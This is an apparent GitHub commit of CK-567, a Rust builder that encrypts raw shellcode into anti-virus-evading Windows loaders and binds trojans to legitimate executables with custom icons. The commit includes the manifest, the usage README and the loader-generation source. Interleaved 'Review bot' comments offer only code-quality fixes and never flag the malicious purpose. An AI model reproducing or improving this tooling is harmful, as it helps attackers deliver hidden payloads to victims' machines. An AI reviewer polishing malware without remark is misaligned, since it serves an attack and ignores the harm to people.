init
TheBlindM committed Jun 26, 2023
0 parents commit 7027823
Showing 14 changed files with 633 additions and 0 deletions.
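--- a/Cargo.toml
+++ b/Cargo.toml
@@ -0,0 +1,30 @@
+[package]
+name = "CK-567"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[build-dependencies]
+winres = "0.1"
+[dependencies]
+aes = "0.8"
+ctr = "0.9"
+cipher = {version = "0.4.3", features=["block-padding"]}
+clap = "4.3.0"
+hex = "0.4.2"
+rust-embed="6.4.0"
+libaes = "*"
+rand = "*"
+base64 = "0.21.2"
+
+winapi = { version = "0.3.9",features = ["libloaderapi","minwinbase","rpc","winnls","heapapi","winuser", "winnt", "memoryapi","sysinfoapi"]}
+
+
+[profile.release]
+opt-level = "z" # 使用最高级别的优化
+lto = true # 启用链接时优化
+codegen-units = 1 # 设置为1以降低编译时间
+panic = 'abort' # 使用 "abort" 模式来处理 panic
+strip = "symbols" # 剥离所有符号,包括调试符号和未使用的符号
+overflow-checks = false # 禁用溢出检查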
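Review bot: `libaes = "*"` and `rand = "*"` accept any published release, so each fresh dependency resolution can pull a different crate version and the build is not reproducible; give them an explicit requirement like the other entries and commit the Cargo.lock so the resolved versions are recorded. The manifest also declares two separate AES implementations (`aes`/`cipher`/`ctr` and `libaes`) — only one is needed. The comment on `opt-level = "z"` says "highest optimization level", but `z` optimizes for size, not speed; `opt-level = 3` is the speed setting if that is what the comment intends.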
76 changes: 76 additions & 0 deletions README.md
@@ -0,0 +1,76 @@
<div align="center">
<h1>CK-567</h1>
<h2>CK-567 强大的Anti-Virus对抗工具</h2>
</div>

### 由遮天 项目组指导
shellcode 格式目前只支持 raw

### 使用
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
```

**加载器:**
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
error: the following required arguments were not provided:
-f <file>
-n <name>
Usage: CK-567.exe shellcode -f <file> -n <name>
For more information, try '--help'.
```
```
CK-567.exe shellcode -f=C:\Users\10431\Desktop\payload.bin -n=a1
```

**捆绑木马:**
```
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
version:0.1
error: the following required arguments were not provided:
-f <file>
-i <ico>
-t <trojan>
Usage: CK-567.exe bind -f <file> -i <ico> -t <trojan>
For more information, try '--help'.
```
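--- a/build.rs
+++ b/build.rs
@@ -0,0 +1,10 @@
+extern crate winres;
+
+
+fn main() {
+if cfg!(target_os = "windows") {
+let mut res = winres::WindowsResource::new();
+res.set_icon("ck.ico");
+res.compile().unwrap();
+}
+}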
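Review bot: `cfg!(target_os = "windows")` in a build script is evaluated for the host the script runs on, not for the target being compiled, so the check does the wrong thing whenever host and target differ; build scripts should read the target from cargo's environment, `if std::env::var("CARGO_CFG_TARGET_OS").as_deref() == Ok("windows") {`. `res.compile().unwrap()` panics with no context when `ck.ico` is missing or the resource compiler is unavailable — `res.compile().expect("winres: failed to embed ck.ico");` says what went wrong. The body is shown without indentation in this rendered view; presumably the committed file is indented.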
Binary file added ck.ico
Binary file not shown.
138 changes: 138 additions & 0 deletions src/core/loader.rs
@@ -0,0 +1,138 @@
use std::fs::{create_dir_all, read, remove_dir_all, write};
use std::path::Path;
use std::process::{Command, Stdio};
use std::ptr::null;

use aes::Aes256;
use rust_embed::RustEmbed;

use crate::utils;
use crate::utils::aesEncrypt;

pub trait Loader {
fn load(&self);
}


#[derive(RustEmbed)]
#[folder = "temp"]
struct temFile;

const key_placeholder: &str = "${key}";
const iv_placeholder: &str = "${iv}";
const base64Str_placeholder: &str = "${base64Str}";
const package_placeholder: &str = "${packageName}";
const hexCode_placeholder: &str = "${hexCode}";

impl Loader for ShellCodeHandler {
fn load(&self) {
println!("shellcode 处理中。。。");
let shellcode = match read(&self.file_path) {
Ok(res) => res,
Err(err) => {
println!("{}", err);
std::process::exit(1);
}
};

let mainFile = temFile::get("shellcode/main.rs").unwrap();
let cargoToml = temFile::get("shellcode/Cargo.toml").unwrap();
let buildRs = temFile::get("shellcode/build.rs").unwrap();
let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();
let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();

let (key, iv, ciphertext) = aesEncrypt(shellcode);

let base64_str = base64::encode(&ciphertext);
let mainFile_str = &mainFile_str.replace(&iv_placeholder, &iv);
let mainFile_str = &mainFile_str.replace(&key_placeholder, &key);
let mainFile_str = &mainFile_str.replace(&hexCode_placeholder, &hex::encode(&base64_str));
let cargoToml_str = &cargoToml_str.replace(&package_placeholder, &self.package_name);


if Some(&self.ico).is_some() & !&self.ico.is_empty() {
println!("ico:{}", self.ico);
let ico = read(&self.ico).unwrap();
let _ = write(format!("loader/ck.ico"), ico);
}

let _ = create_dir_all("loader/src");
let _ = create_dir_all("loader/.cargo");
let _ = write(format!("loader/src/main.rs"), mainFile_str);
let _ = write(format!("loader/Cargo.toml"), cargoToml_str);
let _ = write(format!("loader/build.rs"), buildRs_str);
complie();
}
}

impl Loader for BindHandler {
fn load(&self) {
println!("捆绑文件中。。。");
let path = Path::new(&self.file_path);
let file_name = path.file_name().unwrap().to_str().unwrap();
let file_stem_name = path.file_stem().unwrap().to_str().unwrap();

let mainFile = temFile::get("sleeve/main.rs").unwrap();
let cargoToml = temFile::get("sleeve/Cargo.toml").unwrap();
let buildRs = temFile::get("sleeve/build.rs").unwrap();
let mainFile_str = std::str::from_utf8(mainFile.data.as_ref()).unwrap();
let buildRs_str = std::str::from_utf8(buildRs.data.as_ref()).unwrap();
let cargoToml_str = std::str::from_utf8(cargoToml.data.as_ref()).unwrap();


let cargoToml_str = &cargoToml_str.replace(&package_placeholder, file_stem_name);

if Some(&self.ico).is_some() & !&self.ico.is_empty() {
println!("ico:{}", self.ico);
let ico = read(&self.ico).unwrap();
let _ = write(format!("loader/ck.ico"), ico);
}

let _ = create_dir_all("loader/src");
let _ = create_dir_all("loader/tep");
let _ = create_dir_all("loader/.cargo");
let _ = write(format!("loader/src/main.rs"), mainFile_str);
let _ = write(format!("loader/build.rs"), buildRs_str);
let _ = write(format!("loader/Cargo.toml"), cargoToml_str);

println!("copying file....");

let file = read(self.file_path.clone()).expect(&format!("文件读取失败:{}", &self.file_path));

let _ = write(format!("loader/tep/{}", file_name), file);

//木马文件
println!("{}", &self.trojan_file_path);
let trojan_file = read(&self.trojan_file_path).expect(&format!("文件读取失败:{}", &self.trojan_file_path));
let _ = write(format!("loader/tep/{}.exe", file_stem_name), trojan_file);

complie();
}
}

pub fn complie() {
println!("开始编译...");
let mut cmd = Command::new("cmd")
.arg("/c")
.arg("cd loader && cargo build -Z unstable-options --out-dir ../ --target x86_64-pc-windows-msvc --release")
.spawn()
.expect("编译失败!");

let status = cmd.wait();
let _ = remove_dir_all("loader");
}


pub struct ShellCodeHandler {
pub(crate) file_path: String,
pub(crate) package_name: String,
pub(crate) ico: String,
}

pub struct BindHandler {
pub(crate) file_path: String,
pub(crate) trojan_file_path: String,
pub(crate) ico: String,
}

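Review bot: `Some(&self.ico).is_some()` on both `if` lines is always true, so the condition reduces to the second operand; write `if !self.ico.is_empty() {`. The placeholder constants are already `&str`, so `&iv_placeholder` passes a `&&str` that only works through auto-deref (`replace(iv_placeholder, &iv)` is enough), and `read(self.file_path.clone())` copies a `String` that `read(&self.file_path)` would borrow. `expect(&format!(..))` builds the message even when the read succeeds; `unwrap_or_else(|e| panic!("文件读取失败:{}: {e}", self.file_path))` defers it to the failure path. `Stdio`, `null`, `Aes256` and `utils` are imported but unused here, and `base64::encode` is deprecated in the base64 0.21 line declared in Cargo.toml in favour of the `Engine` API, so this will warn and eventually break on upgrade.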
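--- a/src/core/mod.rs
+++ b/src/core/mod.rs
@@ -0,0 +1 @@
+pub mod loader;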
101 changes: 101 additions & 0 deletions src/main.rs
@@ -0,0 +1,101 @@
use std::borrow::Borrow;
use std::ptr::null;

use aes::{Aes128, Aes128Dec, Aes128Enc};
use aes::cipher::{
BlockCipher, BlockDecrypt, BlockEncrypt, generic_array::GenericArray,
KeyInit,
};
use aes::cipher::{BlockDecryptMut, BlockEncryptMut};
use aes::cipher::block_padding::Pkcs7;
use clap::{Arg, Command};
use hex;
use winapi::um::memoryapi::{VirtualAlloc, VirtualProtect};
use winapi::um::sysinfoapi::GetTickCount;
use winapi::um::winnt::{MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
use winapi::um::winuser::{GetCursorPos, GetLastInputInfo, LASTINPUTINFO, MOUSEMOVEPOINT};

use crate::core::loader::{BindHandler, Loader, ShellCodeHandler};

pub mod utils;
pub mod core;


fn main() {
println!("
▄████▄ ██ ▄█▀
▒██▀ ▀█ ██▄█▒
▒▓█ ▄ ▓███▄░
▒▓▓▄ ▄██▒▓██ █▄
▒ ▓███▀ ░▒██▒ █▄
░ ░▒ ▒ ░▒ ▒▒ ▓▒
░ ▒ ░ ░▒ ▒░
░ ░ ░░ ░
░ ░ ░ ░
");
println!("version:0.1");

let matches = Command::new("ck567")
.subcommands([
Command::new("bind")
.about("捆绑exe")
.arg(
Arg::new("file")
.short('f')
.help("exe 路径")
.required(true)
).arg(
Arg::new("ico")
.short('i')
.help("ico")
.required(true)
).arg(Arg::new("trojan")
.short('t')
.required(true)
.help("木马文件路径")),
Command::new("shellcode")
.about("捆绑exe")
.arg(
Arg::new("file")
.short('f')
.help("shellcode 路径")
.required(true),
)
.arg(Arg::new("name").short('n').required(true).help("生成的exe 名称"))
.arg(
Arg::new("ico")
.short('i')
.help("exe ico")
.required(false)
)
]
)
.get_matches();

if let Some(sub_m) = matches.subcommand_matches("shellcode") {
let fp = sub_m.get_one::<String>("file").unwrap().clone();
let name = sub_m.get_one::<String>("name").unwrap().clone();
let ico;
if let Some(value) = sub_m.get_one::<String>("ico") {
ico = sub_m.get_one::<String>("ico").unwrap().clone();
} else {
ico = String::new();
}

let shell_code_loader = ShellCodeHandler { file_path: fp, package_name: name, ico };
shell_code_loader.load();
} else if let Some(sub_m_1) = matches.subcommand_matches("bundle") {
let fp = sub_m_1.get_one::<String>("file").unwrap().clone();
let trojan = sub_m_1.get_one::<String>("trojan").unwrap().clone();
let ico;
if let Some(value) = sub_m_1.get_one::<String>("ico") {
ico = sub_m_1.get_one::<String>("ico").unwrap().clone();
} else {
ico = String::new();
}

let bind_handler = BindHandler { file_path: fp, trojan_file_path: trojan, ico };
bind_handler.load();
}
}
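Review bot: Both `ico` extractions bind `value` in the `if let` and then ignore it, calling `get_one` a second time with an `unwrap`; the whole `let ico; if let … else …` block collapses to `let ico = sub_m.get_one::<String>("ico").cloned().unwrap_or_default();` (and the same for `sub_m_1`). The `shellcode` subcommand repeats the `bind` subcommand's `about("捆绑exe")` text, so `--help` describes both subcommands identically. `Borrow`, `null`, the `aes` items and the `winapi` items are imported but never used in this file and only add warnings; drop them or move them to the module that uses them.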